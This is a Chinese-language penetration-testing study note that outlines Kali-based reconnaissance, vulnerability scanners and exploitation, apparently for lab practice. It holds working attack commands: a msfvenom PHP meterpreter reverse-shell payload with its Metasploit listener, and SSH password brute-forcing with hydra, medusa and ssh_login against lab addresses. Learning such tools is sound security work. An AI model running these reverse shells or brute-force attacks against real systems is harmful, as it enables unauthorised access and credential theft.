渗透测试
- 一、kali信息搜集
- 1、端口扫描
- 常见的端口服务
- 工具:
- 2、目录扫描
- 工具:
- 3、CMS系统指纹识别
- 工具:
- 4、资产收集工具
- 二、kali漏洞利用
- 1、漏洞数据库
- 2、漏洞扫描工具
- 商业漏洞扫描工具
- 免费漏洞扫描工具
- 国产商业漏洞扫描产品
- 3、msf反弹连接(metasploit framework)
- 01生成payload
- 02监听
- 4、B P爆破web密码
- 5、Hydra暴破Linux密码
渗透测试流程:
一、kali信息搜集
1、端口扫描
常见的端口服务
http:80
https:443
ftp:21
ssh :22
mysql:3306
mssql:1433
rsync:873
oracle:1521
nginx:80
mongo:28017
redis:6379
tomcat:8080
smtp:25
POP3:110
dns:53
telent:23
vnc:5900
rdp:3389
weblogic:7001
工具:
Nmap
Nmap(网络映射器)是最常用的的工具之一。
Netcat
Advanced Port Scanner
Angry IP Scanner等等
2、目录扫描
1.组织一个词典(常见敏感的文件、目录)
2.拼接在网站根目录后面发起访问
如果响应是404不存在,如果是200存在
工具:
Burp Suitedirb
御剑
dirbuster
3、CMS系统指纹识别
常见CMS(Content Management System)
工具:
whatweb
CMSeeK
Wappalyzer
在线网站
御剑指纹扫描器
Test404轻量CMS指纹识别
4、资产收集工具
ARL灯塔
yakit
goby
二、kali漏洞利用
1、漏洞数据库
CVE (Common Vulnerabilities & Exposures )
https://cve.mitre.org/
https://www.cvedetails.com/
https://www.cnvd.org.cn/
https://nox.qianxin.com/vulnerability
POC/EXP
POC: Proof Of Concept
EXP: Exploit利用
POC/EXP工具集
01、
https://www.exploit-db.comgithub
02、
msf /usr/share/exploitdb/exploits/linux/local/(kali)
03、
pocsuite
2、漏洞扫描工具
商业漏洞扫描工具
Appscan
Nessus
OpenVAS
免费漏洞扫描工具
goby
Burp
https://github.com/k8gege/Ladon
国产商业漏洞扫描产品
3、msf反弹连接(metasploit framework)
01生成payload
msfvenom -p php/meterpreter/reverse_tcplhost=192.168.142.132 Iport=7777 -o shell.php
192.168.142.132:kali(控制着、攻击者)的IP
7777自定义的
02监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 7777
exploit
4、B P爆破web密码
抓包之后
先清空
选中所需 add
加载字典,开始爆破
可以点length或者status看看哪个的响应不一样
5、Hydra暴破Linux密码
**hydra -L username.txt -P password.txt 192.168.142.66 ssh**(字典)
medusa -M ssh -h 192.168.142.66 -u root -P password.txt
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.142.66
set PASS_FILE password.txt
set USER_FILE username.txt
exploit